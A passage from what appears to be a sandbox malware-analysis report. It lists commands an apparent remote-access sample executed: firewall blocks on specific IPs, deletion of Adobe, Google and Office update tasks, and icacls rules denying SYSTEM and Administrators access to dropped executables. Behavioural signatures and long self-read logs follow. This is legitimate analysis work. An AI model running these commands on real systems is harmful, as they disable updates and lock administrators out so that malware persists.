  465. "netsh advfirewall firewall add rule name=\"HTTP18\" protocol=TCP action=block dir=out remoteip=178.128.101.72",
  466. "netsh advfirewall firewall add rule name=\"HTTP19\" protocol=TCP action=block dir=IN remoteip=210.108.146.96",
  467. "netsh advfirewall firewall add rule name=\"HTTP20\" protocol=TCP action=block dir=out remoteip=210.108.146.96",
  468. "netsh advfirewall firewall add rule name=\"HTTP21\" protocol=TCP action=block dir=IN remoteip=176.57.70.81",
  469. "netsh advfirewall firewall add rule name=\"HTTP22\" protocol=TCP action=block dir=out remoteip=176.57.70.81",
  470. "netsh advfirewall firewall add rule name=\"HTTP23\" protocol=TCP action=block dir=IN remoteip=61.130.8.22",
  471. "netsh advfirewall firewall add rule name=\"HTTP24\" protocol=TCP action=block dir=out remoteip=61.130.8.22",
  472. "schtasks /Delete /TN \"Adobe Acrobat Update Task\" /F",
  473. "netsh advfirewall firewall add rule name=\"HTTP25\" protocol=TCP action=block dir=IN remoteip=134.209.181.186",
  474. "netsh advfirewall firewall add rule name=\"HTTP26\" protocol=TCP action=block dir=out remoteip=134.209.181.186",
  475. "schtasks /Delete /TN \"Adobe Flash Player NPAPI Notifier\" /F",
  476. "netsh advfirewall firewall add rule name=\"HTTP27\" protocol=TCP action=block dir=IN remoteip=134.209.188.169",
  477. "schtasks /Delete /TN \"GoogleUpdateTaskMachineCore\" /F",
  478. "netsh advfirewall firewall add rule name=\"HTTP28\" protocol=TCP action=block dir=out remoteip=134.209.188.169",
  479. "netsh advfirewall firewall add rule name=\"HTTP29\" protocol=TCP action=block dir=IN remoteip=165.22.143.11",
  480. "schtasks /Delete /TN \"GoogleUpdateTaskMachineUA\" /F",
  481. "netsh advfirewall firewall add rule name=\"HTTP30\" protocol=TCP action=block dir=out remoteip=165.22.143.11",
  482. "schtasks /Delete /TN \"OfficeSoftwareProtectionPlatform\\SvcRestartTask\" /F",
  483. "netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=157.230.120.236",
  484. "netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=157.230.120.236",
  485. "netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=156.67.216.61",
  486. "netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=156.67.216.61",
  487. "netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=165.22.23.102",
  488. "netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=165.22.23.102",
  489. "netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=178.128.74.151",
  490. "netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=178.128.74.151",
  491. "icacls \"\"C:\\WINDOWS\\inf\\lsmm.exe\" /deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)",
  492. "icacls \"\"C:\\WINDOWS\\inf\\lsmm.exe\" /deny system:(OI)(CI)(F)",
  493. "icacls \"\"C:\\WINDOWS\\inf\\lsmm.exe\" /deny Administrators:(OI)(CI)(F)",
  494. "icacls \"\"C:\\WINDOWS\\inf\\msief.exe\" /deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)"
  495.  
  496.  
  497. * Signatures Detected:
  498.  
  499. "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
  500. "Details":
  501.  
  502. "IP": "194.0.200.251:465"
  503.  
  504.  
  505. "IP": "151.139.128.14:80"
  506.  
  507.  
  508.  
  509.  
  510. "Description": "Creates RWX memory",
  511. "Details":
  512.  
  513.  
  514. "Description": "Possible date expiration check, exits too soon after checking local time",
  515. "Details":
  516.  
  517. "process": "rutserv.exe, PID 2716"
  518.  
  519.  
  520.  
  521.  
  522. "Description": "Detected script timer window indicative of sleep style evasion",
  523. "Details":
  524.  
  525. "Window": "WSH-Timer"
  526.  
  527.  
  528.  
  529.  
  530. "Description": "Loads a driver",
  531. "Details":
  532.  
  533. "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\AppID"
  534.  
  535.  
  536.  
  537.  
  538. "Description": "Starts servers listening on 0.0.0.0:5650, :0",
  539. "Details":
  540.  
  541.  
  542. "Description": "Expresses interest in specific running processes",
  543. "Details":
  544.  
  545. "process": "rutserv.exe"
  546.  
  547.  
  548. "process": "schtasks.exe"
  549.  
  550.  
  551. "process": "spoolsv.exe"
  552.  
  553.  
  554. "process": "services.exe"
  555.  
  556.  
  557.  
  558.  
  559. "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
  560. "Details":
  561.  
  562.  
  563. "Description": "Reads data out of its own binary image",
  564. "Details":
  565.  
  566. "self_read": "process: wini.exe, pid: 2872, offset: 0x00000000, length: 0x00000007"
  567.  
  568.  
  569. "self_read": "process: wini.exe, pid: 2872, offset: 0x00000000, length: 0x00002000"
  570.  
  571.  
  572. "self_read": "process: wini.exe, pid: 2872, offset: 0x00000007, length: 0x001ffff0"
  573.  
  574.  
  575. "self_read": "process: wini.exe, pid: 2872, offset: 0x00001ff0, length: 0x00002000"
  576.  
  577.  
  578. "self_read": "process: wini.exe, pid: 2872, offset: 0x00003fe0, length: 0x00002000"
  579.  
  580.  
  581. "self_read": "process: wini.exe, pid: 2872, offset: 0x00005fd0, length: 0x00002000"
  582.  
  583.  
  584. "self_read": "process: wini.exe, pid: 2872, offset: 0x00007fc0, length: 0x00002000"
  585.  
  586.  
  587. "self_read": "process: wini.exe, pid: 2872, offset: 0x00009fb0, length: 0x00002000"
  588.  
  589.  
  590. "self_read": "process: wini.exe, pid: 2872, offset: 0x0000bfa0, length: 0x00002000"
  591.  
  592.  
  593. "self_read": "process: wini.exe, pid: 2872, offset: 0x0000df90, length: 0x00002000"
  594.  
  595.  
  596. "self_read": "process: wini.exe, pid: 2872, offset: 0x0000ff80, length: 0x00002000"
  597.  
  598.  
  599. "self_read": "process: wini.exe, pid: 2872, offset: 0x00011f70, length: 0x00002000"
  600.  
  601.  
  602. "self_read": "process: wini.exe, pid: 2872, offset: 0x00013f60, length: 0x00002000"
  603.  
  604.  
  605. "self_read": "process: wini.exe, pid: 2872, offset: 0x00015f50, length: 0x00002000"
  606.  
  607.  
  608. "self_read": "process: wini.exe, pid: 2872, offset: 0x00017f40, length: 0x00002000"
  609.  
  610.  
  611. "self_read": "process: wini.exe, pid: 2872, offset: 0x00019f30, length: 0x00002000"
  612.  
  613.  
  614. "self_read": "process: wini.exe, pid: 2872, offset: 0x0001bf20, length: 0x00002000"
  615.  
  616.  
  617. "self_read": "process: wini.exe, pid: 2872, offset: 0x0001df10, length: 0x00002000"
  618.  
  619.  
  620. "self_read": "process: wini.exe, pid: 2872, offset: 0x0001ff00, length: 0x00002000"
  621.  
  622.  
  623. "self_read": "process: wini.exe, pid: 2872, offset: 0x00021ef0, length: 0x00002000"
  624.  
  625.  
  626. "self_read": "process: wini.exe, pid: 2872, offset: 0x00023ee0, length: 0x00002000"
  627.  
  628.  
  629. "self_read": "process: wini.exe, pid: 2872, offset: 0x00025ed0, length: 0x00002000"
  630.  
  631.  
  632. "self_read": "process: wini.exe, pid: 2872, offset: 0x00027ec0, length: 0x00002000"
  633.  
  634.  
  635. "self_read": "process: wini.exe, pid: 2872, offset: 0x00029eb0, length: 0x00002000"
  636.  
  637.  
  638. "self_read": "process: wini.exe, pid: 2872, offset: 0x0002bea0, length: 0x00002000"
  639.  
  640.  
  641. "self_read": "process: wini.exe, pid: 2872, offset: 0x0002de90, length: 0x00002000"
  642.  
  643.  
  644. "self_read": "process: wini.exe, pid: 2872, offset: 0x0002fe80, length: 0x00002000"
  645.  
  646.  
  647. "self_read": "process: wini.exe, pid: 2872, offset: 0x00031e70, length: 0x00002000"
  648.  
  649.  
  650. "self_read": "process: wini.exe, pid: 2872, offset: 0x00033e60, length: 0x00002000"
  651.  
  652.  
  653. "self_read": "process: wini.exe, pid: 2872, offset: 0x00035e50, length: 0x00002000"
  654.  
  655.  
  656. "self_read": "process: wini.exe, pid: 2872, offset: 0x00037e40, length: 0x00002000"
  657.  
  658.  
  659. "self_read": "process: wini.exe, pid: 2872, offset: 0x00039e30, length: 0x00002000"
  660.  
  661.  
  662. "self_read": "process: wini.exe, pid: 2872, offset: 0x0003be20, length: 0x00002000"
  663.  
  664.  
  665. "self_read": "process: wini.exe, pid: 2872, offset: 0x0003de10, length: 0x00002000"
  666.  
  667.  
  668. "self_read": "process: wini.exe, pid: 2872, offset: 0x0003fe00, length: 0x00002000"
  669.  
  670.  
  671. "self_read": "process: wini.exe, pid: 2872, offset: 0x00041df0, length: 0x00002000"
  672.  
  673.  
  674. "self_read": "process: wini.exe, pid: 2872, offset: 0x00043de0, length: 0x00002000"
  675.  
  676.  
  677. "self_read": "process: wini.exe, pid: 2872, offset: 0x00045dd0, length: 0x00002000"
  678.  
  679.  
  680. "self_read": "process: wini.exe, pid: 2872, offset: 0x00047dc0, length: 0x00002000"
  681.  
  682.  
  683. "self_read": "process: wini.exe, pid: 2872, offset: 0x00049a00, length: 0x0043cb5e"
  684.  
  685.  
  686. "self_read": "process: wini.exe, pid: 2872, offset: 0x0048680e, length: 0x00000020"
  687.  
  688.  
  689. "self_read": "process: wscript.exe, pid: 2400, offset: 0x00000000, length: 0x00000040"
  690.  
  691.  
  692. "self_read": "process: wscript.exe, pid: 2400, offset: 0x000000f0, length: 0x00000018"
  693.  
  694.  
  695. "self_read": "process: wscript.exe, pid: 2400, offset: 0x000001e8, length: 0x00000078"
  696.  
  697.  
  698. "self_read": "process: wscript.exe, pid: 2400, offset: 0x00018000, length: 0x00000020"
  699.  
  700.  
  701. "self_read": "process: wscript.exe, pid: 2400, offset: 0x00018058, length: 0x00000018"
  702.  
  703.  
  704. "self_read": "process: wscript.exe, pid: 2400, offset: 0x000181a8, length: 0x00000018"
  705.  
  706.  
  707. "self_read": "process: wscript.exe, pid: 2400, offset: 0x00018470, length: 0x00000010"
  708.  
  709.  
  710. "self_read": "process: wscript.exe, pid: 2400, offset: 0x00018640, length: 0x00000012"
  711.  
  712.  
  713. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00000000, length: 0x00000007"
  714.  
  715.  
  716. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00000000, length: 0x00002000"
  717.  
  718.  
  719. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00000007, length: 0x001ffff0"
  720.  
  721.  
  722. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00001ff0, length: 0x00002000"
  723.  
  724.  
  725. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00003fe0, length: 0x00002000"
  726.  
  727.  
  728. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00005fd0, length: 0x00002000"
  729.  
  730.  
  731. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00007fc0, length: 0x00002000"
  732.  
  733.  
  734. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00009fb0, length: 0x00002000"
  735.  
  736.  
  737. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0000bfa0, length: 0x00002000"
  738.  
  739.  
  740. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0000df90, length: 0x00002000"
  741.  
  742.  
  743. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0000ff80, length: 0x00002000"
  744.  
  745.  
  746. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00011f70, length: 0x00002000"
  747.  
  748.  
  749. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00013f60, length: 0x00002000"
  750.  
  751.  
  752. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00015f50, length: 0x00002000"
  753.  
  754.  
  755. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00017f40, length: 0x00002000"
  756.  
  757.  
  758. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00019f30, length: 0x00002000"
  759.  
  760.  
  761. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0001bf20, length: 0x00002000"
  762.  
  763.  
  764. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0001df10, length: 0x00002000"
  765.  
  766.  
  767. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0001ff00, length: 0x00002000"
  768.  
  769.  
  770. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00021ef0, length: 0x00002000"
  771.  
  772.  
  773. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00023ee0, length: 0x00002000"
  774.  
  775.  
  776. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00025ed0, length: 0x00002000"
  777.  
  778.  
  779. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00027ec0, length: 0x00002000"
  780.  
  781.  
  782. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00029eb0, length: 0x00002000"
  783.  
  784.  
  785. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0002bea0, length: 0x00002000"
  786.  
  787.  
  788. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0002de90, length: 0x00002000"
  789.  
  790.  
  791. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0002fe80, length: 0x00002000"
  792.  
  793.  
  794. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00031e70, length: 0x00002000"
  795.  
  796.  
  797. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00033e60, length: 0x00002000"
  798.  
  799.  
  800. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00035e50, length: 0x00002000"
  801.  
  802.  
  803. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00037e40, length: 0x00002000"
  804.  
  805.  
  806. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00039e30, length: 0x00002000"
  807.  
  808.  
  809. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0003be20, length: 0x00002000"
  810.  
  811.  
  812. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0003de10, length: 0x00002000"
  813.  
  814.  
  815. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0003fe00, length: 0x00002000"
  816.  
  817.  
  818. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00041df0, length: 0x00002000"
  819.  
  820.  
  821. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00043de0, length: 0x00002000"
  822.  
  823.  
  824. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00045dd0, length: 0x00002000"
  825.  
  826.  
  827. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00047dc0, length: 0x00002000"
  828.  
  829.  
  830. "self_read": "process: cheat.exe, pid: 2808, offset: 0x00049a00, length: 0x003d5e6e"
  831.  
  832.  
  833. "self_read": "process: cheat.exe, pid: 2808, offset: 0x0041f97e, length: 0x00000020"
  834.  
  835.  
  836. "self_read": "process: R8.exe, pid: 1560, offset: 0x00000000, length: 0x00000007"
  837.  
  838.  
  839. "self_read": "process: R8.exe, pid: 1560, offset: 0x00000000, length: 0x00002000"
  840.  
  841.  
  842. "self_read": "process: R8.exe, pid: 1560, offset: 0x00000007, length: 0x000dddb7"
  843.  
  844.  
  845. "self_read": "process: R8.exe, pid: 1560, offset: 0x00001ff0, length: 0x00002000"
  846.  
  847.  
  848. "self_read": "process: R8.exe, pid: 1560, offset: 0x00003fe0, length: 0x00002000"
  849.  
  850.  
  851. "self_read": "process: R8.exe, pid: 1560, offset: 0x00005fd0, length: 0x00002000"
  852.  
  853.  
  854. "self_read": "process: R8.exe, pid: 1560, offset: 0x00007fc0, length: 0x00002000"
  855.  
  856.  
  857. "self_read": "process: R8.exe, pid: 1560, offset: 0x00009fb0, length: 0x00002000"
  858.  
  859.  
  860. "self_read": "process: R8.exe, pid: 1560, offset: 0x0000bfa0, length: 0x00002000"
  861.  
  862.  
  863. "self_read": "process: R8.exe, pid: 1560, offset: 0x0000df90, length: 0x00002000"
  864.  
  865.  
  866. "self_read": "process: R8.exe, pid: 1560, offset: 0x0000ff80, length: 0x00002000"
  867.  
  868.  
  869. "self_read": "process: R8.exe, pid: 1560, offset: 0x00011f70, length: 0x00002000"
  870.  
  871.  
  872. "self_read": "process: R8.exe, pid: 1560, offset: 0x00013f60, length: 0x00002000"
  873.  
  874.  
  875. "self_read": "process: R8.exe, pid: 1560, offset: 0x00015f50, length: 0x00002000"
  876.  
  877.  
  878. "self_read": "process: R8.exe, pid: 1560, offset: 0x00017f40, length: 0x00002000"
  879.  
  880.  
  881. "self_read": "process: R8.exe, pid: 1560, offset: 0x00019f30, length: 0x00002000"
  882.  
  883.  
  884. "self_read": "process: R8.exe, pid: 1560, offset: 0x0001bf20, length: 0x00002000"
  885.  
  886.  
  887. "self_read": "process: R8.exe, pid: 1560, offset: 0x0001df10, length: 0x00002000"
  888.  
  889.  
  890. "self_read": "process: R8.exe, pid: 1560, offset: 0x0001ff00, length: 0x00002000"
  891.  
  892.  
  893. "self_read": "process: R8.exe, pid: 1560, offset: 0x00021ef0, length: 0x00002000"
  894.  
  895.  
  896. "self_read": "process: R8.exe, pid: 1560, offset: 0x00023ee0, length: 0x00002000"
  897.  
  898.  
  899. "self_read": "process: R8.exe, pid: 1560, offset: 0x00025ed0, length: 0x00002000"
  900.  
  901.  
  902. "self_read": "process: R8.exe, pid: 1560, offset: 0x00027ec0, length: 0x00002000"
  903.  
  904.  
  905. "self_read": "process: R8.exe, pid: 1560, offset: 0x00029eb0, length: 0x00002000"
  906.  
  907.  
  908. "self_read": "process: R8.exe, pid: 1560, offset: 0x0002bea0, length: 0x00002000"
  909.  
  910.  
  911. "self_read": "process: R8.exe, pid: 1560, offset: 0x0002de90, length: 0x00002000"
  912.  
  913.  
  914. "self_read": "process: R8.exe, pid: 1560, offset: 0x0002fe80, length: 0x00002000"
  915.  
  916.  
  917. "self_read": "process: R8.exe, pid: 1560, offset: 0x00031e70, length: 0x00002000"
  918.  
  919.  
  920. "self_read": "process: R8.exe, pid: 1560, offset: 0x00033e60, length: 0x00002000"
  921.  
  922.  
  923. "self_read": "process: R8.exe, pid: 1560, offset: 0x00035e50, length: 0x00002000"
  924.  
  925.  
  926. "self_read": "process: R8.exe, pid: 1560, offset: 0x00037e40, length: 0x00002000"
  927.  
  928.  
  929. "self_read": "process: R8.exe, pid: 1560, offset: 0x00039e30, length: 0x00002000"
  930.  
  931.  
  932. "self_read": "process: R8.exe, pid: 1560, offset: 0x0003be20, length: 0x00002000"
  933.  
  934.  
  935. "self_read": "process: R8.exe, pid: 1560, offset: 0x0003de10, length: 0x00002000"
  936.  
  937.  
  938. "self_read": "process: R8.exe, pid: 1560, offset: 0x0003fe00, length: 0x00002000"
  939.  
  940.  
  941. "self_read": "process: R8.exe, pid: 1560, offset: 0x00041df0, length: 0x00002000"
  942.  
  943.  
  944. "self_read": "process: R8.exe, pid: 1560, offset: 0x00042200, length: 0x00000037"
  945.  
  946.  
  947. "self_read": "process: R8.exe, pid: 1560, offset: 0x00042214, length: 0x000000d1"
  948.  
  949.  
  950. "self_read": "process: R8.exe, pid: 1560, offset: 0x00042237, length: 0x0009bb87"
  951.  
  952.  
  953. "self_read": "process: rutserv.exe, pid: 2716, offset: 0x00000000, length: 0x001b4e00"
  954.  
  955.  
  956. "self_read": "process: wscript.exe, pid: 2444, offset: 0x00000000, length: 0x00000040"
  957.  
  958.  
  959. "self_read": "process: wscript.exe, pid: 2444, offset: 0x000000f0, length: 0x00000018"
  960.  
  961.  
  962. "self_read": "process: wscript.exe, pid: 2444, offset: 0x000001e8, length: 0x00000078"
  963.  
  964.  
  965. "self_read": "process: wscript.exe, pid: 2444, offset: 0x00018000, length: 0x00000020"
  966.  
  967.  
  968. "self_read": "process: wscript.exe, pid: 2444, offset: 0x00018058, length: 0x00000018"
  969.  
  970.  
  971. "self_read": "process: wscript.exe, pid: 2444, offset: 0x000181a8, length: 0x00000018"
  972.  
  973.  
  974. "self_read": "process: wscript.exe, pid: 2444, offset: 0x00018470, length: 0x00000010"
  975.  
  976.  
  977. "self_read": "process: wscript.exe, pid: 2444, offset: 0x00018640, length: 0x00000012"
  978.  
  979.  
  980. "self_read": "process: rutserv.exe, pid: 2008, offset: 0x00000000, length: 0x001b4e00"
  981.  
  982.  
  983. "self_read": "process: rutserv.exe, pid: 3236, offset: 0x00000000, length: 0x001b4e00"
  984.  
  985.  
  986. "self_read": "process: rutserv.exe, pid: 3784, offset: 0x00000000, length: 0x001b4e00"
  987.  
  988.  
  989. "self_read": "process: rfusclient.exe, pid: 2896, offset: 0x00000000, length: 0x00179400"
  990.  
  991.  
  992. "self_read": "process: rfusclient.exe, pid: 4788, offset: 0x00000000, length: 0x00179400"
  993.  
  994.  
  995. "self_read": "process: rfusclient.exe, pid: 2324, offset: 0x00000000, length: 0x00179400"
  996.  
  997.  
  998. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00000000, length: 0x00000007"
  999.  
  1000.  
  1001. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00000000, length: 0x00002000"
  1002.  
  1003.  
  1004. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00000007, length: 0x000ffff0"
  1005.  
  1006.  
  1007. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00001ff0, length: 0x00002000"
  1008.  
  1009.  
  1010. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00003fe0, length: 0x00002000"
  1011.  
  1012.  
  1013. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00005fd0, length: 0x00002000"
  1014.  
  1015.  
  1016. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00007fc0, length: 0x00002000"
  1017.  
  1018.  
  1019. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00009fb0, length: 0x00002000"
  1020.  
  1021.  
  1022. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0000bfa0, length: 0x00002000"
  1023.  
  1024.  
  1025. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0000df90, length: 0x00002000"
  1026.  
  1027.  
  1028. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0000ff80, length: 0x00002000"
  1029.  
  1030.  
  1031. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00011f70, length: 0x00002000"
  1032.  
  1033.  
  1034. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00013f60, length: 0x00002000"
  1035.  
  1036.  
  1037. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00015f50, length: 0x00002000"
  1038.  
  1039.  
  1040. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00017f40, length: 0x00002000"
  1041.  
  1042.  
  1043. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00019f30, length: 0x00002000"
  1044.  
  1045.  
  1046. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0001bf20, length: 0x00002000"
  1047.  
  1048.  
  1049. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0001df10, length: 0x00002000"
  1050.  
  1051.  
  1052. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0001ff00, length: 0x00002000"
  1053.  
  1054.  
  1055. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00021ef0, length: 0x00002000"
  1056.  
  1057.  
  1058. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00023ee0, length: 0x00002000"
  1059.  
  1060.  
  1061. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00025ed0, length: 0x00002000"
  1062.  
  1063.  
  1064. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00027ec0, length: 0x00002000"
  1065.  
  1066.  
  1067. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00029eb0, length: 0x00002000"
  1068.  
  1069.  
  1070. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0002bea0, length: 0x00002000"
  1071.  
  1072.  
  1073. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0002de90, length: 0x00002000"
  1074.  
  1075.  
  1076. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0002fe80, length: 0x00002000"
  1077.  
  1078.  
  1079. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00031e70, length: 0x00002000"
  1080.  
  1081.  
  1082. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00033e60, length: 0x00002000"
  1083.  
  1084.  
  1085. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00034e00, length: 0x00000037"
  1086.  
  1087.  
  1088. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00034e14, length: 0x0033d193"
  1089.  
  1090.  
  1091. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00372707, length: 0x0000004d"
  1092.  
  1093.  
  1094. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00372bb4, length: 0x00000056"
  1095.  
  1096.  
  1097. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037333a, length: 0x00000050"
  1098.  
  1099.  
  1100. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037374a, length: 0x00000059"
  1101.  
  1102.  
  1103. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00373b03, length: 0x0000004e"
  1104.  
  1105.  
  1106. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00373f71, length: 0x00000057"
  1107.  
  1108.  
  1109. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00374328, length: 0x0000004c"
  1110.  
  1111.  
  1112. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00374824, length: 0x00000055"
  1113.  
  1114.  
  1115. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00374c49, length: 0x0000004e"
  1116.  
  1117.  
  1118. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00375417, length: 0x00000057"
  1119.  
  1120.  
  1121. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00375c2e, length: 0x00000052"
  1122.  
  1123.  
  1124. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00376090, length: 0x0000005b"
  1125.  
  1126.  
  1127. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037647b, length: 0x00000051"
  1128.  
  1129.  
  1130. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00376adc, length: 0x0000005a"
  1131.  
  1132.  
  1133. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003772f6, length: 0x0000004b"
  1134.  
  1135.  
  1136. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003777c1, length: 0x00000054"
  1137.  
  1138.  
  1139. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00377bd5, length: 0x0000004d"
  1140.  
  1141.  
  1142. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00378082, length: 0x00000056"
  1143.  
  1144.  
  1145. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00378468, length: 0x00000054"
  1146.  
  1147.  
  1148. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037912c, length: 0x0000004b"
  1149.  
  1150.  
  1151. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00379ae7, length: 0x00000050"
  1152.  
  1153.  
  1154. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037a487, length: 0x00000059"
  1155.  
  1156.  
  1157. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037a940, length: 0x00000057"
  1158.  
  1159.  
  1160. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037d0d7, length: 0x0000004e"
  1161.  
  1162.  
  1163. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037da75, length: 0x0000004e"
  1164.  
  1165.  
  1166. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037df63, length: 0x00000057"
  1167.  
  1168.  
  1169. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037e39a, length: 0x0000004e"
  1170.  
  1171.  
  1172. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037eb78, length: 0x00000057"
  1173.  
  1174.  
  1175. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037efcf, length: 0x0000004c"
  1176.  
  1177.  
  1178. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037f81b, length: 0x00000055"
  1179.  
  1180.  
  1181. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037fc80, length: 0x0000004d"
  1182.  
  1183.  
  1184. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003804dd, length: 0x00000056"
  1185.  
  1186.  
  1187. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00380953, length: 0x0000004b"
  1188.  
  1189.  
  1190. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00380efe, length: 0x00000054"
  1191.  
  1192.  
  1193. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003813d2, length: 0x0000004e"
  1194.  
  1195.  
  1196. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003818a0, length: 0x00000057"
  1197.  
  1198.  
  1199. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00381cb7, length: 0x00000054"
  1200.  
  1201.  
  1202. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0038211b, length: 0x0000005d"
  1203.  
  1204.  
  1205. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003824f8, length: 0x00011456"
  1206.  
  1207.  
  1208. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0039412e, length: 0x00017e37"
  1209.  
  1210.  
  1211. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003acb05, length: 0x00000032"
  1212.  
  1213.  
  1214. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003af017, length: 0x0000a8c4"
